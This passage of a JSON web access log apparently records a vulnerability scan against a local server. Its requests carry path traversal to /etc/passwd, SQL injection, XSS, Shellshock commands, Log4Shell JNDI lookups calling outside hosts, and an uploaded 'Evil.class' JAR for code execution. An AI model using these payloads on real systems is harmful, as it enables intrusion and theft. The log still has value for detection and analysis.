HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json///a.png?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/getagent.cgi?type=s&xxxx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"------WebKitFormBoundaryreButJNjkCniQExX\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x2229N5m8r9Ca9qI3vVwVEVwi8scDH.jar\x22\x0D\x0AContent-Type: application/octet-stream\x0D\x0A\x0D\x0APK\x03\x04\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00META-INF/PK\x03\x04\x0A\x00\x00\x00\x08\x00\xD5J'T\xE6([7j\x00\x00\x00\x81\x00\x00\x00\x14\x00\x00\x00META-INF/MANIFEST.MF\xF3M\xCC\xCBLK-.\xD1\x0DK-*\xCE\xCC\xCF\xB3R0\xD43\xE0\xE5r,J\xCE\xC8,K-B\x08\x07\xE4\xA4V\x94\x16+\xC0$x\xB9\x9CJ3sJt\x9D*\xAD\x14RRRx\xB9\x9C\x8BR\x13KRS\xC0\x02\x8E\x05\x89\xC9\x19\xA9\x0A\xBE\x89e\xA9y\x0A\xC6z\x16z\x86\x10\xE5)\xBA^)\xD9 \x1B,\xF4\x0C\xE2\x8D\x0D\x81\xA2\xBC\x5C\x00PK\x03\x04\x0A\x00\x00\x00\x08\x00\xD6J'Tb\xED\xA9)^\x03\x00\x00\x1C\x06\x00\x00\x0A\x00\x00\x00Evil.class}T\xD9Z\xD3@\x18=\xD3mJ\x08\x14\xCB\x22\xB8\xE3Z\x14\xA8\x0B\x88R\xC4\x05Q\xAB- \x15$\xE2\x96\xA6#\x04\xDA\x04\xD3\xC4O\x9F\x88[\xBD\x01\x94O/\xBD\xF0Y|\x06\xF1\x9F\xB4B\x0B\xFD\xCC\xC5$s\xCE\xBF\x9E\xFC3\xBF\xFE|\xFB\x01`\x08y\x05\x871\xC2qCA\x00#\x0Anb\x94#\x15\xC5X\x14\xB7\xE4n\x9C\xE36\xC7\x1D\x05wqO\x81\x82\x09\x05M\xB8\x1F\xC5\xA4|?h\xC6C<\x92_i\x8E\xC7\x0A\xE2x\x12EFA\x18Y\x8E)\x8Ei\x86\xC8\x98i\x99\xEE8C0\xD17\xCF\x10\x9A\xB0\x0B\x82!\x961-1\xE5\x95\xF2\xC2y\xA6\xE7\x8B\x84\xC43\xB6\xA1\x17\xE7u\xC7\x94\xFB*\x18r\x97\xCD2\xC5\xC8L~0\x8B)\x06\xD5\xF0\xCA\xAE]\xCA\x0Aw\xD9.0\x9COdV\xF4\x0Fz\xB2\xA8[K\xC9\x9C\xEB\x98\xD6R\xAA\xEF Dq\xC4Ga0\xB4\xD7p3\x8Em\x88r\x99\xC8\xD6\xBC\xF7\xEE\x9DpDaV\xE8\x05\xE10tW\xCCL;y\xAF\x8E\x91\x81\x8AT\xB7,\xB6A\x12FD\xE7\xAEkzz\xF2\xA3!\xD6\x5C\xD3\xB6\x88\x0B\x1A%\xAA7\xE2\x88\xB2Wt\x19\xDA*f\x9Ek\x16\x93\x19\xB3\xEC\x92EW}\xFF\x9F\xD6\xFEipv\x9F\xED\xD8\xC1\xDC\xE3\xE4\xDF\x92suc5\xAB\xAF\xF9n\xBE\xFA)\x8E\x19\x8E\xA7\xFE\x0F|\xCC\xA0\xE4l\xCF1\xC4\x03SFm\x92\x8A\x0E\xCAH*\xBA\xD1C\xDA\xECe\xB9\xEB8\xFA'\x99\x8AcVE\x0E\xCF\xA8\xE0\xFD9\x19x2oZ\xC9\xF22C`\xC0P\xD1\x8B9j\xA2\xB1p\x0C=\xBB\xB2Xk\x9EK!\x84^\xAApT\xA0\x8Ay<\x97e,\xC8Ec\x80\x8A\x17X\xA4\xEAU\xBC\xC4+\x15\xAF\xF7\x0A\xACWV\xC5\x1B,\x92\xF2\x8A\x8A\xB7\xD0\xE9\xF7\xC8\xAE\xEA\xAA\x9D\xCE\xAF\x08\x83\x14o\xAD\x17\x91\xE1\xD0\x81Q\xA8\xC3f=\xCB5K$\x94\xB2$\xDC\xDDMg\xA2v\xBC\xAA0\x89\x9FH,\xFE\x7F\x12k\xA6\x8D\xE2\xD5\x88\xC0p\xF8_\xCCzu\xC8\xB4;\xD1\x90\x90\xC7\xA8}\x8F\xAA\xCE\xA6D\xA3\xC4\x172\xFE\x84v$\x1A\x1E\x84\xA0^(\xC862\xFB\x15J\xF5\xBD`\x08\x1BE\xBB\x5C\xED9K\xE5\xEAK\xF2\x0C\xAE\xD8\xA6\xC5p\xA7\xD6gbYwr\xE2\xBD',C\xA4j\xF0\xB4+\x1C9~\x8DN!MH\x17]5\xF2\x09\x80\xC9\xA1\xA3\xF5\x08\xED\x92\xF4\xA6\x7F\x8E\xF0\xC5M\xB0/>}\x94\xD6\x88\x0Fr\x1C\x83\x9C\x07\xDF\x00\xC7q\x82\xDE\x0C'q\xAA\xE2\xCC\xD2\x84F\x08[\xDDF@\xDBD0\xBB\x85P\xE4;\xC2Z0\x1E\xC9i\xA18\xCFi\xE1K\xB9\x0DD\xA7\xB6\xD1\xA4mC\xD1\x066\xD0\xBC\x09u\x13-\xA3\xA1x\xEBh\xB8'\xB4\x81\x986\x1A\xFE\x89X\x7FO\xF8+\xDA\x02x\xBE\xBE\xF3[\xC2\x87\xD6\x11\x9B\xEA'\x87\xF6\x0A\x1C\xEF\xE8\xDFB\xE7gJ\x1D\xC5\x1C\x16\xE8\xBA\x0B\xF9\xA5\x0E\xA2\x99V\x85Py\x0EZ0\x8CV\xBA9c\xB8\x8F6\xCC\x90\xD5\x1Cu\xBE\x80\x0Eh\xE8D\x814\x90-=\xA2\xD6z\xE9\xFE\xED\xC5i\x04\xC9\xE3\x14\xCE\xE0,\xC5\xBBI\xEC9\x9C\xA7\xB64\x8Az\x01\x09b\xA9\xBDj\xEB\xF2\xAB\x8FXY\x81\x81\x8B\xB8Db\xF5W\x05\xAA \x03\x84\x0C\x12r\x19\xA1\x1D\x0A\x16\xE1Hr\x5C\xE6\xB8\xC2q\x95\xE3\x1A}\x03];\x94<\xB8\xCB\x80q\x0C5S\x84a_\xFC\xEB\x7F\x01PK\x03\x04\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0F\x00\x00\x00META-INF/maven/PK\x03\x04\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1B\x00\x00\x00META-INF/maven/org.example/PK\x03\x04\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00#\x00\x00\x00META-INF/maven/org.example/eviljar/PK\x03\x04\x0A\x00\x00\x00\x08\x00\xC2H'TR\xFE\xB1L\x16\x01\x00\x00;\x02\x00\x00*\x00\x00\x00META-INF/maven/org.example/eviljar/pom.xml\x85RMo\xC2 \x18\xBE\xF7W4\xBD\x17\xEA\xB6\x83i\x10\xB3\xCB\xB2%:M\xEA\x96]\x09}W1-\x10\xC0\xB6?\x7F\x0C\xD4\xD4D#\xB7\xF7\xF9x?\x9E@\x96c\xD7\xA6=\x18+\x94\x5Cd3Td)H\xAEj!\x9BE\xF6\xB5{\xCB\xE7\xD9\x92&D\x1Bu\x00\xEER\xAF\x96v\x91\xED\x9D\xD3%\xC6\x1D\xEBA\x22\xA6\x19\xDF\x03R\xA6\xC1\xDB\xCD\x1A\xBF\xA0\xC2wI\xD2\xF3\x0B\x96r\xB4\xE2b\x1B\x86\x01\x0D\xCF\xC1\xF0T\x143\xFC\xB3^U\xBEC\xC7r!\xADc\x92\xC3\xD4nEi\x03\xBBR\x9C\xB9\xB0\xE6\xC3\xF1\xE9=\xC5h\xEB\x08\xE6A\x87|\x9D\xD10\x8Ct\xAA\x86\xF6;&A\x03K\xF0\x15\x96D]c\xD4Q\x7F\xD4\xD4\xB7C0\xB2N\xB7@\xF0\x19\x8C\x12f\x9C\xF8e\xDCy\x00z\xD1\x1E\x98!x\x82E\xD1)t\xEA3\xCF\xAB\xCF\xD7m\xF5\xBE\xD9\x11\xDC_\x0F\xF3\xB9k\xF0N\xB0\xF4\x12\x09\x89Wq\xD5i\xD1\x82AV\x1D\x0D\x07:'\xF86q\xD7\xE8\x98i\xC0\xDD0\x9E\x88\xB8\x02\x9E\xEE\x90\x84\xF2\xFF+\xD0?PK\x03\x04\x0A\x00\x00\x00\x08\x00kI'TG\xCF\xAA\xA7s\x00\x00\x00s\x00\x00\x001\x00\x00\x00META-INF/maven/org.example/eviljar/pom.properties\x0D\xC8K\x0A\xC20\x10\x00\xD0\xFD\xC0\xDCa\xA0kK\x92\x8DX\xE8B\x04\x7F\xE0\x07\xD2\x0B\x8CvZ\x225)c\x0Cz{}\xCBW\xED$\x8Ar\x96\x9En_:q\x91\x88Pm5\xD0\x91#\x99%\x99Ucm\xE3\x0Cm|G\xCE8\x87PD_!\xC5\xD6\xD6f\xE1\xCF\xEB\xAB\xDF_:\x84Q\xD3{>\xF4m\xD2\xB1\x96\x0F?\xE7I\x10Xs\x18\xF8\x9E\xFF/%L\x0FV\x84\x1FPK\x01\x02\x14\x03\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\xEDA\x00\x00\x00\x00META-INF/PK\x01\x02\x14\x03\x0A\x00\x00\x00\x08\x00\xD5J'T\xE6([7j\x00\x00\x00\x81\x00\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA4\x81'\x00\x00\x00META-INF/MANIFEST.MFPK\x01\x02\x14\x03\x0A\x00\x00\x00\x08\x00\xD6J'Tb\xED\xA9)^\x03\x00\x00\x1C\x06\x00\x00\x0A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA4\x81\xC3\x00\x00\x00Evil.classPK\x01\x02\x14\x03\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\xFF\xFFI\x04\x00\x00META-INF/maven/PK\x01\x02\x14\x03\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1B\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\xFF\xFFv\x04\x00\x00META-INF/maven/org.example/PK\x01\x02\x14\x03\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00#\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\xFF\xFF\xAF\x04\x00\x00META-INF/maven/org.example/eviljar/PK\x01\x02\x14\x03\x0A\x00\x00\x00\x08\x00\xC2H'TR\xFE\xB1L\x16\x01\x00\x00;\x02\x00\x00*\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA4\x81\xF0\x04\x00\x00META-INF/maven/org.example/eviljar/pom.xmlPK\x01\x02\x14\x03\x0A\x00\x00\x00\x08\x00kI'TG\xCF\xAA\xA7s\x00\x00\x00s\x00\x00\x001\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA4\x81N\x06\x00\x00META-INF/maven/org.example/eviljar/pom.propertiesPK\x05\x06\x00\x00\x00\x00\x08\x00\x08\x00?\x02\x00\x00\x10\x07\x00\x00\x00\x00\x0D\x0A------WebKitFormBoundaryreButJNjkCniQExX\x0D\x0AContent-Disposition: form-data; name=\x22request\x22; filename=\x22blob\x22\x0D\x0AContent-Type: application/json\x0D\x0A\x0D\x0Anull\x0D\x0A------WebKitFormBoundaryreButJNjkCniQExX--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /plugin/add HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nacos/v1/auth/users?pageNo=1&pageSize=9 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Nacos-Server", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WidgetHandler.ashx?MethodName=Sort&ID=1&row=1&column=%28SELECT%20CONCAT%28CONCAT%28CHAR%28126%29%2C%28SELECT%20SUBSTRING%28%28ISNULL%28CAST%28db_name%28%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%29%2C1%2C1024%29%29%29%2CCHAR%28126%29%29%29 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.027","http_user_agent":"${jndi:ldap://${hostName}.useragent.ca2u0eosmpv1jhs80ca0atkycyc57judd.oast.fun}", "http_referer":"${jndi:ldap://${hostName}.referer.ca2u0eosmpv1jhs80ca0hgnunjpens15t.oast.fun}", "request_method":"GET", "http_x_forwarded_for":"${jndi:ldap://${hostName}.xforwardedfor.ca2u0eosmpv1jhs80ca0euohah4epy9qe.oast.fun}"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/12 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/eatery/nav.php?-Menu-=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/cam_portal.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pentaho/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"errorpage=/etc/passwd&obj-action=auth&:action=login","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/webproc HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.bz2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/new-year-firework/firework/index.php?text=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/altair/functions/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?wahi=JzthbGVydChkb2N1bWVudC5kb21haW4pOy8v HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json///a.js?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pandora_console/ajax.php?page=../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"{\x22entry\x22:\x22Evil\x22,\x22request\x22:\x22id\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /plugin/customMethod HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v1/auth/users?pageNo=1&pageSize=9 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Nacos-Server", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /owa/auth/logon.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"fullPath=/etc/passwd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /fileDownload?action=downloadBackupFile HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /readme.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/13 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mod/lti/auth.php?redirect_uri=javascript:alert('29N5mBZDocaGXWgd7qFVS0yMFxR') HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /haproxy-status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /SSI/Auth/ip_snmp.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /goforms/rlminfo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 